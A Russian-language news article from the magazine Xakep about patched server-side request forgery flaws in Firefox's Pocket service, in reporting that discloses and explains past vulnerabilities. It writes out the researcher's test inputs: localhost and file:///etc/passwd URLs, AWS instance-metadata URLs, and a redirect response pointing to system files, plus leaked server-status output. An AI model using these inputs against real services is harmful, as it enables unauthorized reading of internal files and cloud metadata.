Многочисленные уязвимости обнаружены в расширении Pocket для Firefox

Рекомендуем почитать:

Xakep #304. IP-камеры на пентестах

• Содержание выпуска
• Подписка на «Хакер»-60%

Решение Mozilla внедрить Pocket во все версии Firefox в свое время вызвало критику у специалистов по безопасности и обычных пользователей. Расширение не отключается и не удаляется никаким способом. Проблему даже оформили как тикет в баг-трекере Bugzilla, но разработчики из Mozilla не пошли на уступки и оставили Pocket в составе Firefox.

Теперь у критиков появился еще один аргумент. В Pocket найдено множество уязвимостей. И хотя разработчики выпустили патчи для них, но это ещё раз доказывает, что от расширения может быть больше вреда, чем пользы.

Pocket предназначен для сохранения веб-страниц и последующего чтения на компьютере или мобильном устройстве. Достаточно указать ему URL — и документ сохраняется на потом.

Специалист по безопасности Клинт Руохо (Clint Ruoho) попробовал «скормить» Pocket нестандартные ссылки.

• file:///etc/passwd
• ssh://localhost
• telnet://localhost:25

Безуспешно. Зато повезло с другой ссылкой.

http://127.0.0.1/server-status

Сервер Pocket принял запрос и прислал ответ.

Apache Server Status for 127.0.0.1

Server Version: Apache/2.2.29 (Unix) DAV/2
Server Built: Mar 12 2015 03:50:17
Current Time: Tuesday, 28-Jul-2015 10:07:45 CDT
Restart Time: Tuesday, 28-Jul-2015 03:20:12 CDT
Parent Server Generation: 12
Server uptime: 6 hours 47 minutes 32 seconds
Total accesses: 241913 - Total Traffic: 4.1 GB
CPU Usage: u1209.24 s110.06 cu0 cs0 - 5.4% CPU load
9.89 requests/sec - 177.5 kB/second - 17.9 kB/request
40 requests currently being processed, 14 idle workers
...

Дальше — больше. Оказалось, что Pocket использует в своей работе Amazon EC2. В сервисе EC2 есть служебная функция Instance Metadata and User Data, доступ к которой осуществляется локально без аутентификации. Но если отправить правильный URL «на сохранение» в Pocket, то как раз такой запрос и выполнится локально, выдав хакеру служебные метаданные о виртуальной машине: зона, тип инстанса, тип сети, MAC-адрес, сведения о подключенном устройстве хранения.

• http://169.254.169.254/latest/meta-data/
• http://169.254.169.254/latest/meta-data/hostname
• http://169.254.169.254/latest/meta-data/ami-id

Пожалуй, самая опасная уязвимость связана с обработкой редиректов краулером Pocket. Если отправить ссылку, которая указывает редирект на file:///etc/passwd, то Pocket скачает-таки file:///etc/passwd с сервера.

HTTP/1.1 301 Moved Permanently
Location: file:///etc/passwd
Content-Length: 52
Date: Tue, 28 Jul 2015 18:42:58 GMT
Connection: keep-alive

Moved Permanently. Redirecting to file:///etc/passwd

Та же история с файлом file:///proc/self/status, который дает информацию о запущенных процессах.

У пользователей Firefox возникает вопрос: нужно ли такое «дырявое» расширение в браузере?